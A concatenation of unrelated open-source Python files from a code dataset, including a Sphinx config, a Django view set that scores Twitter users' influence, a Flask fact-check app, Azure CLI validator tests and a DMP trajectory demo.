# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AmazonDistributedRunnerdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AmazonDistributedRunner.tex', u'Amazon Distributed Runner Documentation',
u'Bas Hoonhout', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'amazondistributedrunner', u'Amazon Distributed Runner Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AmazonDistributedRunner', u'Amazon Distributed Runner Documentation',
author, 'AmazonDistributedRunner', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
openearth/amazon-distributed-runner
|
docs/conf.py
|
Python
|
gpl-3.0
| 9,513
|
__doc_format__ = "reStructuredText"
'''
Shows info about netCDF on command line!
:Author: kmu
:Created: 18. jan. 2012
'''
''' Imports '''
# Built-in
import sys
execfile("../themes/set_pysenorge_path.py")
# Additional
# Own
from pysenorge.io.nc import NCreport
if len(sys.argv) != 2:
print "USAGE: NCreport <path_to_netCDF_file>"
else:
NCreport(sys.argv[1], stdout=True)
|
kmunve/pysenorge
|
pysenorge/tools/NCreport.py
|
Python
|
gpl-3.0
| 401
|
from django.shortcuts import render, HttpResponse
from django.http import JsonResponse
import tweepy
from .models import TwitterUser
from os import environ
config = {
'consumer_key': environ['consumer_key'],
'consumer_secret': environ['consumer_secret'],
'access_key': environ['access_key'],
'access_secret': environ['access_secret']
}
auth = tweepy.OAuthHandler(config["consumer_key"], config["consumer_secret"])
auth.set_access_token(config["access_key"], config["access_secret"])
api = tweepy.API(auth)
# Create your views here.
def getInitialUserData(request):
for i in range(15):
searched_users = api.search_users(q="India", page=i + 1, geocode="28.6139,77.2090,50km")
searched_users = list(searched_users)
for user in range(len(searched_users)):
json_data = searched_users[user]._json
twitter_id = json_data['id']
follower_count = json_data['followers_count']
location = json_data['location']
profile_image_url = json_data['profile_image_url']
username = json_data['screen_name'].lower()
try:
TwitterUser.objects.create(twitter_id=twitter_id, follower_count=follower_count,
twitter_username=username, profile_image=profile_image_url, location=location)
except:
pass
return HttpResponse("All data fetched")
def getTweetData(request):
allUsers = TwitterUser.objects.all()
for user in allUsers:
uid = user.twitter_id
if not user.total_fav_count or not user.total_retweet_count:
try:
timeline = api.user_timeline(uid)
timeline = list(timeline)
favorite_count = 0
retweet_count = 0
for tweet in range(len(timeline)):
json_data = timeline[tweet]._json
favorite_count += json_data['favorite_count']
retweet_count += json_data['retweet_count']
try:
t = TwitterUser.objects.get(twitter_id=uid)
except:
print uid
t.total_fav_count = favorite_count
t.total_retweet_count = retweet_count
t.save()
except:
return HttpResponse("Rate Limit exceeded! Wait 15 mins")
return HttpResponse("Favourites and Retweets calculated!")
def calculate_rank():
allUsers = TwitterUser.objects.all().order_by('-impact_score')
i = 1
for user in allUsers:
user.rank = i
user.save()
i += 1
def calculate_impact_score(request):
max_impact_val = 161300000
allUsers = TwitterUser.objects.all()
for user in allUsers:
if user.total_retweet_count and user.total_fav_count:
social_impact_score = social_impact_formula(
user.total_retweet_count,
user.total_fav_count,
0,
user.follower_count)
user.impact_score = (
(social_impact_score / max_impact_val) * 10000
) % 100
user.save()
calculate_rank()
return HttpResponse("Social Impact Score calculated")
def social_impact_formula(retweet, favorites, tweets, followers):
return retweet * 8.5 + favorites * 5.5 + tweets * 6 + followers * 9.25
def calculate_for_single_user(request, username):
username = username.lower()
try:
timeline = api.user_timeline(username)
except Exception, e: # API call failed
timeline = None
if timeline:
timeline = list(timeline)
favorite_count = 0
retweet_count = 0
for tweet in range(len(timeline)):
json_data = timeline[tweet]._json
favorite_count += json_data['favorite_count']
retweet_count += json_data['retweet_count']
follower_count = json_data['user']['followers_count']
location = json_data['user']['location']
profile_image_url = json_data['user']['profile_image_url']
twitter_id = json_data['user']['id']
try:
t = TwitterUser.objects.get(twitter_username=username)
return return_json_data()
print "done"
except:
if not timeline:
return JsonResponse({"message": "username not found"}, status=400, content_type="application/json")
t = TwitterUser.objects.create(twitter_id=twitter_id, total_fav_count=favorite_count, total_retweet_count=retweet_count,
follower_count=follower_count, twitter_username=username, profile_image=profile_image_url, location=location)
max_impact_val = 161300000
social_impact_score = social_impact_formula(
t.total_retweet_count, t.total_fav_count, 0, t.follower_count)
t.impact_score = ((social_impact_score / max_impact_val) * 10000) % 100
t.save()
calculate_rank()
return return_json_data()
def return_json_data():
return JsonResponse(
all_twitter_user_serializer(
TwitterUser.objects.all()
),
safe=False,
status=200,
content_type="application/json"
)
def single_twitter_user_serializer(twitter_user):
d = {}
d['twitter_id'] = twitter_user.twitter_id
d['twitter_username'] = twitter_user.twitter_username
d['follower_count'] = twitter_user.follower_count
d['total_fav_count'] = twitter_user.total_fav_count
d['total_retweet_count'] = twitter_user.total_retweet_count
d['location'] = twitter_user.location
d['impact_score'] = twitter_user.impact_score
d['profile_image_url'] = twitter_user.profile_image
d['rank'] = twitter_user.rank
return d
def all_twitter_user_serializer(twitter_users):
result = []
for user in twitter_users:
d = {}
d['twitter_id'] = user.twitter_id
d['twitter_username'] = user.twitter_username
d['follower_count'] = user.follower_count
d['total_fav_count'] = user.total_fav_count
d['total_retweet_count'] = user.total_retweet_count
d['location'] = user.location
d['impact_score'] = user.impact_score
d['profile_image_url'] = user.profile_image
d['rank'] = user.rank
result.append(d)
return result
def index(request):
return render(request, 'index.html', {})
|
CuriousLearner/AngelHackDelhi2016
|
trendingtweeps/tweeps/views.py
|
Python
|
mit
| 6,463
|
#!/usr/bin/env python
"""
Example application views.
Note that `render_template` is wrapped with `make_response` in all application
routes. While not necessary for most Flask apps, it is required in the
App Template for static publishing.
"""
import app_config
import logging
import oauth
import os
import parse_doc
import static
from copydoc import CopyDoc
import copytext
from flask import Flask, make_response, render_template
from flask_cors import CORS, cross_origin
from render_utils import flatten_app_config, make_context
from render_utils import smarty_filter, urlencode_filter
from werkzeug.debug import DebuggedApplication
app = Flask(__name__)
app.debug = app_config.DEBUG
CORS(app)
app.add_template_filter(smarty_filter, name='smarty')
app.add_template_filter(urlencode_filter, name='urlencode')
logging.basicConfig(format=app_config.LOG_FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(app_config.LOG_LEVEL)
@app.route('/factcheck.html', methods=['GET', 'OPTIONS'])
def _factcheck():
"""
Liveblog only contains published posts
"""
context = get_factcheck_context()
return make_response(render_template('factcheck.html', **context))
@app.route('/factcheck_preview.html', methods=['GET', 'OPTIONS'])
def _preview():
"""
Preview contains published and draft posts
"""
context = get_factcheck_context()
return make_response(render_template('factcheck.html', **context))
@app.route('/embeds/<slug>.html', methods=['GET', 'OPTIONS'])
def _embed(slug):
"""
Specific annotations can be embedded
"""
context = get_factcheck_context();
context['slug'] = slug
contents = context['contents']
annotations = [post for post in contents if post['type'] == 'annotation' and post['published'] == 'yes']
filtered = [post for post in annotations if post['slug'] == slug]
filtered = filtered[0]
context['filtered'] = filtered
index = contents.index(filtered)
paragraphs = int(filtered.get('prior', 1))
start = index - paragraphs;
prior = contents[start:index]
context['prior'] = prior
return make_response(render_template('embed.html', **context))
@app.route('/embeds/', methods=['GET', 'OPTIONS'])
def _embedlist():
"""
List out embeddable annotations
"""
context = get_factcheck_context()
contents = context['contents']
annotations = [post for post in contents if post['type'] == 'annotation' and post['published'] == 'yes']
published = [x for x in annotations if x['published'] == 'yes']
slugs = [x['slug'] for x in published]
context['slugs'] = slugs
return make_response(render_template('embedlist.html', **context))
@app.route('/share.html', methods=['GET', 'OPTIONS'])
def _share():
"""
Preview contains published and draft posts
"""
context = get_factcheck_context()
return make_response(render_template('share.html', **context))
@app.route('/copydoc.html', methods=['GET', 'OPTIONS'])
def _copydoc():
"""
Example view demonstrating rendering a simple HTML page.
"""
with open(app_config.TRANSCRIPT_HTML_PATH) as f:
html = f.read()
doc = CopyDoc(html)
context = {
'doc': doc
}
return make_response(render_template('copydoc.html', **context))
@app.route('/child.html')
def child():
"""
Example view demonstrating rendering a simple HTML page.
"""
context = make_context()
return make_response(render_template('child.html', **context))
@app.route('/')
@app.route('/index.html')
@oauth.oauth_required
def index():
"""
Example view demonstrating rendering a simple HTML page.
"""
context = make_context()
return make_response(render_template('parent.html', **context))
@app.route('/preview.html')
def preview():
"""
Example view demonstrating rendering a simple HTML page.
"""
context = make_context()
return make_response(render_template('parent.html', **context))
app.register_blueprint(static.static)
app.register_blueprint(oauth.oauth)
def get_factcheck_context():
"""
Get factcheck context
for production we will reuse a fake g context
in order not to perform the parsing twice
"""
from flask import g
context = make_context()
context['config'] = flatten_app_config()
parsed_factcheck_doc = getattr(g, 'parsed_factcheck', None)
if parsed_factcheck_doc is None:
logger.debug("did not find parsed_factcheck")
with open(app_config.TRANSCRIPT_HTML_PATH) as f:
html = f.read()
context.update(parse_document(html))
else:
logger.debug("found parsed_factcheck in g")
context.update(parsed_factcheck_doc)
return context
def parse_document(html):
doc = CopyDoc(html)
parsed_document = parse_doc.parse(doc)
return parsed_document
# Enable Werkzeug debug pages
if app_config.DEBUG:
wsgi_app = DebuggedApplication(app, evalex=False)
else:
wsgi_app = app
# Catch attempts to run the app directly
if __name__ == '__main__':
logging.error('This command has been removed! Run "fab app" instead!')
|
nprapps/debates
|
app.py
|
Python
|
mit
| 5,127
|
# subsystemBonusCaldariPropulsion2WarpSpeed
#
# Used by:
# Subsystem: Tengu Propulsion - Interdiction Nullifier
type = "passive"
def handler(fit, src, context):
fit.ship.boostItemAttr("warpSpeedMultiplier", src.getModifiedItemAttr("subsystemBonusCaldariPropulsion2"),
skill="Caldari Propulsion Systems")
|
bsmr-eve/Pyfa
|
eos/effects/subsystembonuscaldaripropulsion2warpspeed.py
|
Python
|
gpl-3.0
| 337
|
# -*- coding: utf-8 -*-
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
from . import mail_mail
from . import mail_mass_mailing
from . import mail_mass_mailing_list
from . import mail_unsubscription
|
open-synergy/social
|
mass_mailing_custom_unsubscribe/models/__init__.py
|
Python
|
agpl-3.0
| 221
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for UpdateFeature
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_generated_aiplatform_v1beta1_FeaturestoreService_UpdateFeature_async]
from google.cloud import aiplatform_v1beta1
async def sample_update_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
feature = aiplatform_v1beta1.Feature()
feature.value_type = "BYTES"
request = aiplatform_v1beta1.UpdateFeatureRequest(
feature=feature,
)
# Make the request
response = await client.update_feature(request=request)
# Handle the response
print(response)
# [END aiplatform_generated_aiplatform_v1beta1_FeaturestoreService_UpdateFeature_async]
|
googleapis/python-aiplatform
|
samples/generated_samples/aiplatform_generated_aiplatform_v1beta1_featurestore_service_update_feature_async.py
|
Python
|
apache-2.0
| 1,617
|
#!/usr/bin/env python
import pyslurm
a = pyslurm.job()
print pyslurm.slurm_job_cpus_allocated_on_node("shivling")
jobs = a.get()
print jobs
|
phantez/pyslurm
|
examples/job_test.py
|
Python
|
gpl-2.0
| 144
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
from unittest import mock
from azure.cli.command_modules.cdn._validators import validate_origin
from knack.util import CLIError
class ValidatorTests(unittest.TestCase):
def test_validate_origin_passes_on_empty(self):
namespace = mock.MagicMock()
self.assertEqual(validate_origin(namespace), True)
def test_validate_origin_on_http_port_range_high(self):
namespace = mock.MagicMock()
origin = mock.MagicMock()
origin.http_port = 65537
namespace.origins = [origin]
with self.assertRaises(CLIError):
validate_origin(namespace)
def test_validate_raise_on_https_port_range_high(self):
namespace = mock.MagicMock()
origin = mock.MagicMock()
origin.http_port = 80
origin.https_port = 65537
namespace.origins = [origin]
with self.assertRaises(CLIError):
validate_origin(namespace)
def test_validate_raise_on_http_port_range_low(self):
namespace = mock.MagicMock()
origin = mock.MagicMock()
origin.http_port = -1
origin.https_port = 443
namespace.origins = [origin]
with self.assertRaises(CLIError):
validate_origin(namespace)
def test_validate_raise_on_https_port_range_low(self):
namespace = mock.MagicMock()
origin = mock.MagicMock()
origin.http_port = 80
origin.https_port = -443
namespace.origins = [origin]
with self.assertRaises(CLIError):
validate_origin(namespace)
|
yugangw-msft/azure-cli
|
src/azure-cli/azure/cli/command_modules/cdn/tests/latest/test_validators.py
|
Python
|
mit
| 1,899
|
# This file is part of DmpBbo, a set of libraries and programs for the
# black-box optimization of dynamical movement primitives.
# Copyright (C) 2014 Freek Stulp, ENSTA-ParisTech
#
# DmpBbo is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# DmpBbo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DmpBbo. If not, see <http://www.gnu.org/licenses/>.
## \file demoDmpChangeInitial.py
## \author Freek Stulp
##
## \ingroup Demos
## \ingroup Dmps
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import os, sys
lib_path = os.path.abspath('../')
sys.path.append(lib_path)
lib_path = os.path.abspath('../../python')
sys.path.append(lib_path)
from functionapproximators.FunctionApproximatorLWR import *
from dmp.Dmp import *
from dmp.Trajectory import *
from dmp.dmp_plotting import *
def getDemoTrajectory(ts):
use_viapoint_traj= True
if (use_viapoint_traj):
n_dims = 2
y_first = -0.2*np.ones(n_dims)
y_last = 0.1*np.ones(n_dims)
if (n_dims==2):
y_last[1] = -0.8
viapoint_time = 0.25
viapoint_location = -0.5*np.ones(n_dims)
if (n_dims==2):
viapoint_location[1] = -0.8
y_yd_ydd_viapoint = np.zeros(3*n_dims)
y_yd_ydd_viapoint[:n_dims] = viapoint_location
return Trajectory.generatePolynomialTrajectoryThroughViapoint(ts,y_first,y_yd_ydd_viapoint,viapoint_time,y_last)
else:
n_dims = 2
y_first = np.linspace(0.0,0.7,n_dims) # Initial state
y_last = np.linspace(0.4,0.5,n_dims) # Final state
return Trajectory.generateMinJerkTrajectory(ts, y_first, y_last)
if __name__=='__main__':
# GENERATE A TRAJECTORY
tau = 0.5
n_time_steps = 51
ts = np.linspace(0,tau,n_time_steps) # Time steps
trajectory = getDemoTrajectory(ts) # getDemoTrajectory() is implemented below
y_init = trajectory.initial_y()
y_attr = trajectory.final_y()
#fig = plt.figure(1)
#axs1 = [ fig.add_subplot(231), fig.add_subplot(132), fig.add_subplot(133) ]
#lines = plotTrajectory(trajectory.asMatrix(),axs1)
#plt.show()
n_dims = trajectory.dim()
# WRITE THINGS TO FILE
directory = "/tmp/demoDmpChangeGoalPython"
trajectory.saveToFile(directory,"demonstration_traj.txt")
# MAKE THE FUNCTION APPROXIMATORS
function_apps = [ FunctionApproximatorLWR(10), FunctionApproximatorLWR(10)]
sigmoid_max_rate=-20
dmp = Dmp(tau, y_init, y_attr, function_apps, "Dmp", sigmoid_max_rate)
# CONSTRUCT AND TRAIN THE DMP
dmp.train(trajectory)
tau_exec = 0.7
n_time_steps = 71
ts = np.linspace(0,tau_exec,n_time_steps)
# INTEGRATE DMP TO GET REPRODUCED TRAJECTORY
for goal_number in range(7):
y_init_variant = y_init + (0.2*(goal_number-3))*np.ones(n_dims)
# ANALYTICAL SOLUTION
dmp.set_initial_state(y_init_variant)
( xs, xds, forcing_terms, fa_outputs) = dmp.analyticalSolution(ts)
traj_reproduced = dmp.statesAsTrajectory(ts,xs,xds)
basename = "reproduced" + str(goal_number)
traj_reproduced.saveToFile(directory,basename+"_traj.txt")
dt = ts[1]
xs_step = np.zeros([n_time_steps,dmp.dim_])
xds_step = np.zeros([n_time_steps,dmp.dim_])
dmp.set_initial_state(y_init_variant)
(x,xd) = dmp.integrateStart()
xs_step[0,:] = x
xds_step[0,:] = xd
for tt in range(1,n_time_steps):
(xs_step[tt,:],xds_step[tt,:]) = dmp.integrateStep(dt,xs_step[tt-1,:])
traj_reproduced = dmp.statesAsTrajectory(ts,xs_step,xds_step)
basename = "reproduced_num" + str(goal_number)
traj_reproduced.saveToFile(directory,basename+"_traj.txt")
print("Plotting")
for numerical_or_analytical in [1,2]:
figure_number = numerical_or_analytical
fig = plt.figure(figure_number)
if numerical_or_analytical==1:
fig.suptitle("Analytical Solution")
else:
fig.suptitle("Numerical Integration")
axs1 = [ fig.add_subplot(231), fig.add_subplot(232), fig.add_subplot(233) ]
axs2 = [ fig.add_subplot(234), fig.add_subplot(235), fig.add_subplot(236) ]
trajectory = numpy.loadtxt(directory+"/demonstration_traj.txt")
traj_dim0 = trajectory[:,[0,1,3,5]]
traj_dim1 = trajectory[:,[0,2,4,6]]
lines = plotTrajectory(traj_dim0,axs1)
lines.extend(plotTrajectory(traj_dim1,axs2))
plt.setp(lines, linestyle='-', linewidth=8, color=(0.4,0.4,0.4))
for goal_number in range(7):
basename = "reproduced"+str(goal_number)
if numerical_or_analytical==2:
basename = "reproduced_num"+str(goal_number)
trajectory = numpy.loadtxt(directory+"/"+basename+"_traj.txt")
traj_dim0 = trajectory[:,[0,1,3,5]]
traj_dim1 = trajectory[:,[0,2,4,6]]
lines = plotTrajectory(traj_dim0,axs1)
lines.extend(plotTrajectory(traj_dim1,axs2))
plt.setp(lines, linestyle='--', linewidth=3, color=(0,0.7,0))
labels = ["Demonstration"]
#labels.extend(scalings)
plt.legend(labels)
plt.show()
|
stulp/dmpbbo
|
demos_python/dmp/demoDmpChangeInitial.py
|
Python
|
lgpl-2.1
| 5,839
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.